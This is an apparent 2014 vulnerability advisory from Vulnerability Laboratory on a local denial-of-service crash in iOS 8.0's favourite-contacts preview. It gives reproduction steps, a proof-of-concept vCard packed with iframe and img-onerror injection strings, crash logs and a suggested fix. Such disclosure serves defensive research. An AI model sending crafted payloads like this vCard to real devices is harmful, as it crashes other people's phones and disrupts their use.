Apple iOS v8.0.2 - Silent Contact Denial of Service Vulnerability

2014-11-03T00:00:00
ID SECURITYVULNS:DOC:31343
Type securityvulns
Reporter Securityvulns
Modified 2014-11-03T00:00:00

Description

Document Title:

Apple iOS v8.0.2 - Silent Contact Denial of Service Vulnerability

References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1324

Video: http://www.vulnerability-lab.com/get_content.php?id=1333

Article: http://vulnerability-db.com/magazine/articles/2014/10/22/apple-ios-v802-silent-contact-0day-vulnerability-denial-service

Release Date:

2014-10-23

Vulnerability Laboratory ID (VL-ID):

1324

Common Vulnerability Scoring System:

3.1

Product & Service Introduction:

iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012, behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by Apple on September 12, 2012, 400 million devices have been sold through June 2012.

The user interface of iOS is based on the concept of direct manipulation, using multi-touch gestures. Interface control elements consist of sliders, switches, and buttons. Interaction with the OS includes gestures such as swipe, tap, pinch, and reverse pinch, all of which have specific definitions within the context of the iOS operating system and its multi-touch interface. Internal accelerometers are used by some applications to respond to shaking the device (one common result is the undo command) or rotating it in three dimensions (one common result is switching from portrait to landscape mode).

iOS is derived from OS X, with which it shares the Darwin foundation. iOS is Apple`s mobile version of the OS X operating system used on Apple computers.

In iOS, there are four abstraction layers: the Core OS layer, the Core Services layer, the Media layer, and the Cocoa Touch layer. The current version of the operating system (iOS 6.1) dedicates 1-1.5 GB of the device`s flash memory for the system partition, using roughly 800 MB of that partition (varying by model) for iOS itself. iOS currently runs on iPhone, Apple TV, iPod Touch, and iPad.

( Copy of the Homepage: http://en.wikipedia.org/wiki/IOS )

Abstract Advisory Information:

The Vulnerability Laboratory Research Team discovered a local denial of service vulnerability in the official Apple iOS v8.0 mobile device system.

Vulnerability Disclosure Timeline:

2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri - VL Core Research Team) 2014-10-23: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Published

Affected Product(s):

Apple Product: iOS 8.0

Exploitation Technique:

Local

Severity Level:

Medium

Technical Details & Description:

A local denial of service vulnerability has been discovered in the Apple iOS v8.0 (12A365) mobile application device system. The issue allows a local attacker to shutdown the mobile application system by a corrupt interaction with a default function.

The local denial of service vulnerability is located in the favorite contact preview slideshow message button. During the tests of the new feature we included several script codes and string to evade the validation. After the manipulation of a .vcf file the researcher was able to catch a critical unhandled NSRangeException (__NSArrayI objectAtIndex).

The injected strings in the contact file (.vcf) crashs the internal message application only when processing to open the malicious contact in the favorite or history through the new preview slidebar. The bug appears to confuse the the mechanism that parses the context of the contact thats gets converted to the message and executes the code invisible like we can see in the error exception logs of the analysis tools. Even if the array shows an empty value the injected script code with the frame will return and executes. As result to prevent a deeper corruption the mobile restarts after 10 seconds during to the invalid process loop continues.

The security risk of the local denial of service vulnerability is estimated aslow with a cvss (common vulnerability scoring system) count of 3.1. Exploitation of the local denial of service vulnerability requires a physical device access without interaction. Successful exploitation of the local denial of service vulnerability results in device shutdown and ui application crash by a corruption that causes through an unhandled (uncaught) exception.

Affected Device(s): [+] Apple > iPhone 5 & 6

Affected OS Version(s): [+] iOS v8.0 (12A365)

Tested Device(s): [+] Apple iPhone 5s & 6 > iOS v8.0 (12A365)

Proof of Concept (PoC):

The denial of service vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manually steps to reproduce the security vulnerability ...

  1. Start the mobile iOS device (ipad2, iphone 5s or iphone 6) with the new iOS v8.0
  2. Import the file to the local ios contacts service
  3. Call the new service one time without paying anything because the call is invalid Note: After the call the contact becomes visible to the `history` in the task slide preview module! It`s also possible to interact by an include to the `favority contacts` module to exploit
  4. Go to the home screen of ios and press two times the home button to review the new iOS 8.0 feature with the favorites or history contacts
  5. Press the include test contact and open the message/imessage symbole
  6. The application crashs with an unknown exception and the mobile shutsdown Note: The contact can be send by imessage, email or via sms to compromise the preview contact slideshow of favorites or history calls
  7. Successful exploitation of the local denial of service vulnerability!

PoC: Import or Exchange (*.vcf)

BEGIN:VCARD VERSION:3.0 PRODID:-//Apple Inc.//iOS 8.0//EN N:>"<iframe Src=a>%20<iframe>;"><img Src=a Onerror=prompt(23)\;>;;; FN:"><img Src=a Onerror=prompt(23)\;> >"<iframe Src=a>%20<iframe> ORG:>"<iframe Src=a>%20<iframe>; EMAIL;type=INTERNET;type=HOME;type=pref:"><img Src=a Onerror=prompt(23)\;> TEL;type=HOME;type=VOICE;type=pref:"><img Src=a Onerror=prompt(23)\;> item1.ADR;type=HOME;type=pref:;;>"<iframe Src=a>%20<iframe"><img Src=a Onerror=prompt(23)\;>>. \n"><img Src=a Onerror=prompt(23)\;>;"><img Src=a Onerror=prompt(23)\;>;;"><img Src=a Onerror=prompt(23)\;>;Deutschland item1.X-ABADR:de item2.ADR;type=WORK:;;"><img Src=a Onerror=prompt(23)\;>;;;;Deutschland item2.X-ABADR:de item3.URL;type=pref:>"<iframe Src=a>%20<iframe> item3.X-ABLabel:$!<HomePage>!$ BDAY;value=date:1604-03-21 item4.IMPP;X-SERVICE-TYPE=Skype;type=pref:skype:%22%3E%3Cimg%20Src=a%20Onerror=prompt(23)\;%3E item4.X-ABLabel:Skype item5.X-ABDATE;type=pref:1604-03-21 item5.X-ABLabel:$!<Anniversary>!$ item6.X-ABRELATEDNAMES;type=pref:"><img Src=a Onerror=prompt(23)"><img Src=a Onerror=prompt(23)\;>\;> item6.X-ABLabel:$!<Mother>!$ END:VCARD

--- Debug Exceptions Logs --- So. Sep. 21 16:15:31 Console[789] <Warning>: A view can only be associated with at most one view controller at a time! View <UIView: 0x33fdb0; frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x33f660>> is associated with <UIViewController: 0x25b2d0>. Clear this association before associating this view with <RootViewController: 0x24b070>. - So. Sep. 21 16:15:31 Console[789] <Error>: Terminating app due to uncaught exception 'NSRangeException', reason: ' -[__NSArrayI objectAtIndex:]: index 0 beyond bounds for empty array' *** First throw call stack: (0x28700e3f 0x35daec8b 0x28615e9d 0x29fd 0x2bddb759 0x2bdc75ef 0x2bdc743b 0x2be29a83 0x2bc137d7 0x2bc1376f 0x2bc1363f 0x2bc135bf 0x2bb9f9cb 0x2bc13311 0x2bc12d2b 0x2bc11b29 0x2bc45351 0x2bb9b453 0x2bb9ab31 0x2bb9aa4d 0x2bba4e73 0x2bba48d3 0x2249 0x2bc08d8d 0x2bdfdf23 0x2be0001b 0x2be0a899 0x2bdfe8a7 0x2ee410e9 0x286c75b5 0x286c6879 0x286c4ffb 0x28613621 0x28613433 0x2bc02a1f 0x2bbfd809 0x21f3 0x21c4) - So. Sep. 21 16:15:59 Console[792] <Warning>: A view can only be associated with at most one view controller at a time! View <UIView: 0x250e30; frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x250b80>> is associated with <UIViewController: 0x25ea80>. Clear this association before associating this view with <RootViewController: 0x334fe0>. - So. Sep. 21 16:17:05 Console[801] <Warning>: A view can only be associated with at most one view controller at a time! View <UIView: 0x249c90; frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x249b70>> is associated with <UIViewController: 0x253560>. Clear this association before associating this view with <RootViewController: 0x246190>.

--- Error ConsoleOD Logs --- Model: iPhone Hardware: iPhone 5s & 6 System: iPhone OS 8.0 ----- 1: Time: 2014-09-21 14:24:00 +0000 Level: Warning Message: -[AppDelegate application:didFinishLaunchingWithOptions:] [Line 33] App: Console-OD 2.0 (136) System: iPhone OS 8.0 Model: iPhone Machine: iPhone5,2, iPhone 5s & 6 ASLMessageID: 26364 SenderMachUUID: FED10905-08D0-3ABF-B373-62DD4EB96085 Host: IPhone-360337 Sender: Console-OD UID: 501 Facility: com.jomnius.console-od GID: 501 ReadUID: 501 TimeNanoSec: 6936000 CFLog Thread: 907 PID: 822 CFLog Local Time: 2014-09-21 16:23:57.005

----- 2: Time: 2014-09-21 14:26:08 +0000 Level: Warning Message: -[AppDelegate application:didFinishLaunchingWithOptions:] [Line 33] App: Console-OD 2.0 (136) System: iPhone OS 8.0 Model: iPhone Machine: iPhone5,2, iPhone 5s & 6 ASLMessageID: 26572 SenderMachUUID: FED10905-08D0-3ABF-B373-62DD4EB96085 Host: IPhone-360337 Sender: Console-OD UID: 501 Facility: com.jomnius.console-od GID: 501 ReadUID: 501 TimeNanoSec: 876089000 CFLog Thread: 907 PID: 832 CFLog Local Time: 2014-09-21 16:25:41.874

--- Cobi Console Log ---

So Sep. 21 16:24:00 com.cobi.cobiapp Cobi Tools[821] <Warning>: unexpected nil window in _UIApplicationHandleEventFromQueueEvent, _windowServerHitTestWindow: <UIClassicWindow: 0x16659b70; frame = (0 0; 320 480); userInteractionEnabled = YES; gestureRecognizers = <NSArray: 0x1665b560>; layer = <UIWindowLayer: 0x1665a080>>

--- Error System Logs & Exceptions --- 21/09/2014 16:08:19 [System Log] Warning : LaunchServices: invalidationHandler called 21/09/2014 16:08:16 [System Log] Warning : Unable to simultaneously satisfy constraints. Probably at least one of the constraints in the following list is one you don't want. Try this: (1) look at each constraint and try to figure out which you don't expect; (2) find the code that added the unwanted constraint or constraints and fix it. (Note: If you're seeing NSAutoresizingMaskLayoutConstraints that you don't understand, refer to the documentation for the UIView property translatesAutoresizingMaskIntoConstraints) ( "<NSLayoutConstraint:0x17f867d0 UIView:0x17f81ba0.bottom == _UIAlertControllerView:0x17f81790.bottom>", "<NSLayoutConstraint:0x17f87cb0 V:|-(0)-[UIView:0x17d3d2a0] (Names: '|':_UIAlertControllerView:0x17f81790 )>", "<NSLayoutConstraint:0x17f87d10 UIView:0x17d3d2a0.bottom <= _UIAlertControllerView:0x17f81790.bottom>", "<NSLayoutConstraint:0x17f87d70 UIView:0x17f81ba0.centerY == UIView:0x17d3d2a0.centerY>", "<NSLayoutConstraint:0x17f867a0 V:|-(>=8)-[UIView:0x17f81ba0] (Names: '|':_UIAlertControllerView:0x17f81790 )>" )

Will attempt to recover by breaking constraint <NSLayoutConstraint:0x17f87d10 UIView:0x17d3d2a0.bottom <= _UIAlertControllerView:0x17f81790.bottom>

Make a symbolic breakpoint at UIViewAlertForUnsatisfiableConstraints to catch this in the debugger. The methods in the UIConstraintBasedLayoutDebugging category on UIView listed in <UIKit/UIView.h> may also be helpful. 21/09/2014 16:08:16 [System Log] Warning : LaunchServices: invalidationHandler called 21/09/2014 16:08:16 [System Log] Warning : Unknown activity items supplied: ( { "public.plain-text" = <32312f30 392f3230 31342031 363a3038 3a313020 5b537973 74656d20 4c6f675d 20576172 6e696e67 203a203c 476f6f67 6c653e20 41647665 72746973 696e6720 74726163 6b696e67 206d6179 20626520 64697361 626c6564 2e20546f 20676574 20746573 74206164 73206f6e 20746869 73206465 76696365 2c20656e 61626c65 20616476 65727469 73696e67 20747261 636b696e 672e0a>; }, "<UIPrintInfo: 0x17e355b0>" )

--- Log Police Error Logs (HTML) --- <!DOCTYPE HTML> <html><body> <table align='center' border='1'><tbody> <tr><th align='center'>ID</th><th align='center'>Time</th><th align='center'>Sender</th><th align='center'>Level</th><th align='center'>Message</th></tr> <tr><td align='right'>24306</td><td align='center'>21.09.14 15:56:35</td><td align='center'>LogPolice</td><td align='center'>Warning</td> <td align='left'><code>>"<img Src="x"></code></td></tr> <tr><td align='right'>24329</td><td align='center'>21.09.14 15:57:25</td><td align='center'>LogPolice</td><td align='center'>Warning</td> <td align='left'><code>Terminating since there is no system app.</code></td></tr> </tbody></table> </body></html> <html><head></head><body></body></html>

Solution - Fix & Patch:

To fix the NSRangeException issue it is required to return to the index beyond bounds with 1 and not with an empty array. (__NSArrayI objectAtIndex) Setup a own exception-handling to prevent invisible execution through the invalidationHandler. (<Warning>: unexpected nil window in _UIApplicationHandleEventFromQueueEvent, _windowServerHitTestWindow)

Security Risk:

The security risk of the local denial of service vulnerability thats exploitable through the favorite message app is estimated as low.

Credits & Authors:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:

The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

            Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

-- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com COMPANY: Evolution Security GmbH BUSINESS: www.evolution-sec.com